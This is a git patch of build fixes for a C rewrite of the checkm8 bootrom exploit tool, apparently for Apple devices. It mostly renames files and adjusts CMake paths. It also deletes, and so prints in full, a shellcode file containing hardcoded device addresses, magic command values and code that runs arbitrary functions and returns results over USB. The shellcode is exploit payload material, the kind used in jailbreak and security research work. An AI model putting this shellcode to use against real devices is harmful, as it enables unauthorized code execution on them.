From bd36b6d8d22b7bfd1896f781a802e2d0951ccbdd Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Sat, 7 Dec 2019 15:28:48 -0500 Subject: [PATCH] Build fixes --- CMakeLists.txt | 3 +- checkm8_remote/CMakeLists.txt | 8 +- checkm8_remote/{ => include}/checkm8.h | 0 checkm8_remote/{ => include}/conf.h | 0 checkm8_remote/{ => include}/libusb_helpers.h | 0 checkm8_remote/main.c | 2 +- checkm8_remote/shellcode/shellcode.c | 127 ------------------ checkm8_remote/{ => src}/commands.c | 0 checkm8_remote/{ => src}/exploit.c | 0 checkm8_remote/{ => src}/libusb_helpers.c | 2 +- libusb/config.h | 2 +- 11 files changed, 8 insertions(+), 136 deletions(-) rename checkm8_remote/{ => include}/checkm8.h (100%) rename checkm8_remote/{ => include}/conf.h (100%) rename checkm8_remote/{ => include}/libusb_helpers.h (100%) delete mode 100644 checkm8_remote/shellcode/shellcode.c rename checkm8_remote/{ => src}/commands.c (100%) rename checkm8_remote/{ => src}/exploit.c (100%) rename checkm8_remote/{ => src}/libusb_helpers.c (99%) diff --git a/CMakeLists.txt b/CMakeLists.txt index c7390e5..3ce1e8c 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -2,8 +2,9 @@ cmake_minimum_required(VERSION 3.10) project(ipwndfu_rewrite_c) enable_language(C) +include_directories(libusb/src/) add_library(checkm8_libusb - checkm8_remote/conf.h libusb/config.h + checkm8_remote/include/conf.h libusb/config.h libusb/src/core.c libusb/src/descriptor.c libusb/src/hotplug.c libusb/src/io.c libusb/src/strerror.c libusb/src/sync.c diff --git a/checkm8_remote/CMakeLists.txt b/checkm8_remote/CMakeLists.txt index bdafbe2..d0775a7 100644 --- a/checkm8_remote/CMakeLists.txt +++ b/checkm8_remote/CMakeLists.txt @@ -1,9 +1,7 @@ set(CMAKE_C_STANDARD 99) set(CMAKE_C_FLAGS -g) -add_executable(checkm8_remote main.c conf.h - libusb_helpers.c libusb_helpers.h exploit.c - checkm8.h commands.c) +include_directories(include) +add_executable(checkm8_remote main.c src/libusb_helpers.c src/commands.c src/exploit.c) - -target_link_libraries(checkm8_remote libusb_checkm8 pthread udev) \ No newline at end of file +target_link_libraries(checkm8_remote checkm8_libusb pthread udev) \ No newline at end of file diff --git a/checkm8_remote/checkm8.h b/checkm8_remote/include/checkm8.h similarity index 100% rename from checkm8_remote/checkm8.h rename to checkm8_remote/include/checkm8.h diff --git a/checkm8_remote/conf.h b/checkm8_remote/include/conf.h similarity index 100% rename from checkm8_remote/conf.h rename to checkm8_remote/include/conf.h diff --git a/checkm8_remote/libusb_helpers.h b/checkm8_remote/include/libusb_helpers.h similarity index 100% rename from checkm8_remote/libusb_helpers.h rename to checkm8_remote/include/libusb_helpers.h diff --git a/checkm8_remote/main.c b/checkm8_remote/main.c index 988ef01..9087fc6 100644 --- a/checkm8_remote/main.c +++ b/checkm8_remote/main.c @@ -1,5 +1,5 @@ #include -#include "exploit/checkm8.h" +#include "checkm8.h" int main() { diff --git a/checkm8_remote/shellcode/shellcode.c b/checkm8_remote/shellcode/shellcode.c deleted file mode 100644 index 6e141bb..0000000 --- a/checkm8_remote/shellcode/shellcode.c +++ /dev/null @@ -1,127 +0,0 @@ -#define EXEC_MAGIC 0x6578656365786563 -#define DONE_MAGIC 0x646F6E65646F6E65 -#define MEMC_MAGIC 0x6D656D636D656D63 -#define MEMS_MAGIC 0x6D656D736D656D73 - -unsigned long *LOAD_ADDRESS = 0x1800B0000; -const unsigned long *USB_CORE_DO_IO = 0x10000DC98; - - -unsigned long *memset_shellcode(unsigned long *target, unsigned long data, unsigned long nbytes) -{ - unsigned long value = (data & 0xFFu) * 0x101010101010101; - - unsigned long *addr = target; - while(nbytes >= 8) - { - *addr = value; - addr++; - nbytes -= 8; - } - - if(nbytes >= 4) - { - *(unsigned int *) addr = (unsigned int) value; - addr = (unsigned long *) (((unsigned int *) addr) + 1); - nbytes -= 4; - } - - if(nbytes >= 2) - { - *(unsigned short *) addr = (unsigned short) value; - addr = (unsigned long *) (((unsigned short *) addr) + 1); - nbytes -= 2; - } - - if(nbytes != 0) - { - *(unsigned char *) addr = (unsigned char) value; - } - - return target; -} - -unsigned long *memcpy_shellcode(unsigned long *target, unsigned long *source, unsigned long nbytes) -{ - unsigned long *addr = target; - while(nbytes >= 8) - { - *addr = *source; - addr++; - source++; - - nbytes -= 8; - } - - if(nbytes >= 4) - { - *(unsigned int *) addr = *(unsigned int *) source; - addr = (unsigned long *) (((unsigned int *) addr) + 1); - source = (unsigned long *) (((unsigned int *) source) + 1); - - nbytes -= 4; - } - - if(nbytes >= 2) - { - *(unsigned short *) addr = *(unsigned short *) source; - addr = (unsigned long *) (((unsigned short *) addr) + 1); - source = (unsigned long *) (((unsigned short *) source) + 1); - - nbytes -= 2; - } - - if(nbytes != 0) - { - *(unsigned char *) addr = *(unsigned char *) source; - addr = (unsigned long *) (((unsigned char *) addr) + 1); - source = (unsigned long *) (((unsigned char *) source) + 1); - - nbytes -= 2; - } - - return target; -} - -void shellcode(unsigned short length) -{ - unsigned long *addr = LOAD_ADDRESS; - unsigned long res; - - if(length + 2 == -1) - { - res = *LOAD_ADDRESS; - if(res == EXEC_MAGIC) - { - unsigned long - (*ptr)(unsigned long, unsigned long, unsigned long, unsigned long, - unsigned long, unsigned long, unsigned long, unsigned long) = - (unsigned long (*)(unsigned long, unsigned long, unsigned long, unsigned long, - unsigned long, unsigned long, unsigned long, unsigned long)) addr[1]; - - addr[0] = 0; - res = ptr(addr[2], addr[3], addr[4], addr[5], addr[6], addr[7], addr[8], addr[8]); - addr[0] = DONE_MAGIC; - addr[1] = res; - } - else - { - if(res == MEMC_MAGIC) - { - addr[0] = 0; - memcpy_shellcode(addr[2], addr[3], addr[4]); - addr[0] = DONE_MAGIC; - } - else if(res == MEMS_MAGIC) - { - addr[0] = 0; - memset_shellcode(addr[2], addr[3], addr[4]); - addr[0] = DONE_MAGIC; - } - } - } - - void (*usb_core_do_io)(unsigned char, unsigned long *, unsigned short, unsigned short) = - (void (*)(unsigned char, unsigned long *, unsigned short, unsigned short)) USB_CORE_DO_IO; - usb_core_do_io(0x80, addr, length + 6, 0); -} diff --git a/checkm8_remote/commands.c b/checkm8_remote/src/commands.c similarity index 100% rename from checkm8_remote/commands.c rename to checkm8_remote/src/commands.c diff --git a/checkm8_remote/exploit.c b/checkm8_remote/src/exploit.c similarity index 100% rename from checkm8_remote/exploit.c rename to checkm8_remote/src/exploit.c diff --git a/checkm8_remote/libusb_helpers.c b/checkm8_remote/src/libusb_helpers.c similarity index 99% rename from checkm8_remote/libusb_helpers.c rename to checkm8_remote/src/libusb_helpers.c index 7a08157..f1b3366 100644 --- a/checkm8_remote/libusb_helpers.c +++ b/checkm8_remote/src/libusb_helpers.c @@ -1,5 +1,5 @@ #include "libusb_helpers.h" -#include "../libusb/src/libusb.h" +#include "libusb.h" #include #include diff --git a/libusb/config.h b/libusb/config.h index 54e812a..d441d84 100644 --- a/libusb/config.h +++ b/libusb/config.h @@ -1,7 +1,7 @@ /* config.h. Generated from config.h.in by configure. */ /* config.h.in. Generated from configure.ac by autoheader. */ -#include "../checkm8_remote/conf.h" +#include "../checkm8_remote/include/conf.h" /* Default visibility */ #define DEFAULT_VISIBILITY __attribute__((visibility("default")))